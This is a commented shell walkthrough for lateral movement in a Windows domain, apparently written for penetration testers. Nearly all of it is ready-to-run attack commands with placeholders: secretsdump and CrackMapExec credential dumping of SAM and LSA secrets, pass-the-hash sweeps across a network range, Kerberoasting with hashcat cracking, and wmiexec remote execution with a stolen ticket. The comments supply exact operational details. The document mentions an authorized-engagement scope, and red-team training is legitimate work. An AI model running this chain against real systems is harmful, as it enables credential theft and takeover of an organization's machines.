Lateral Movement Strategy
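# Lateral-movement walkthrough with Impacket + CrackMapExec. Angle-bracket
# tokens are placeholders to be replaced; run only inside an authorized
# engagement scope.
#
# Handling notes that apply to every phase:
#   - each step prints credential material to the terminal; direct output to
#     files with restricted permissions and destroy them at engagement end.
#   - Impacket's -hashes takes LM:NT, so an NT-only hash is written ":<NT>";
#     CrackMapExec's -H accepts the bare NT hash.

# Phase 1: initial credential extraction (needs local admin on the target).
# The password is deliberately omitted so secretsdump prompts for it: a
# password on argv lands in shell history and is visible to every local user
# via `ps`. -outputfile writes the dump to files instead of only the screen.
python3 secretsdump.py '<domain>/<username>@<initial-target>' -outputfile phase1

# Phase 2: pass-the-hash across the range to find where this hash is valid.
# --continue-on-success keeps scanning after the first hit so every host is
# enumerated; this is noisy (one authentication attempt per host, each logged).
crackmapexec smb '<network-range>' -u '<username>' -H '<NTLM-hash>' --continue-on-success

# Phase 3: dump SAM and LSA secrets from the hosts where Phase 2 succeeded.
crackmapexec smb '<new-targets>' -u '<username>' -H '<NTLM-hash>' --sam --lsa

# Phase 4: Kerberoast - request TGS tickets for SPN-bearing accounts.
# -hashes is LM:NT; the leading ':' leaves LM empty. -outputfile saves the
# ticket hashes in hashcat format rather than scrolling them off screen.
python3 GetUserSPNs.py '<domain>/<username>' -hashes ':<NTLM-hash>' -dc-ip '<DC-IP>' -request -outputfile spns.txt

# Phase 4b: crack offline, then obtain a TGT for the service account.
# GetUserSPNs only yields a crackable TGS hash, not a usable ticket; the
# .ccache used in Phase 5 must come from getTGT.py once the password is
# recovered (-m 13100 is hashcat's Kerberos 5 TGS-REP etype 23 mode).
# getTGT.py prompts for the password when it is omitted from argv, and writes
# <service-account>.ccache into the current directory.
hashcat -m 13100 spns.txt '<wordlist>'
python3 getTGT.py '<domain>/<service-account>' -dc-ip '<DC-IP>'

# Phase 5: Kerberos-based lateral movement with the cached TGT.
# KRB5CCNAME must be an absolute path to the file getTGT.py wrote. -k makes
# wmiexec use the ccache and -no-pass suppresses the password prompt. The
# target must be its FQDN (not an IP) so the requested SPN matches, and clock
# and DNS must agree with the DC or the Kerberos exchange fails.
export KRB5CCNAME="$PWD/<service-account>.ccache"
python3 wmiexec.py '<domain>/<service-account>@<high-value-target-fqdn>' -k -no-pass -dc-ip '<DC-IP>'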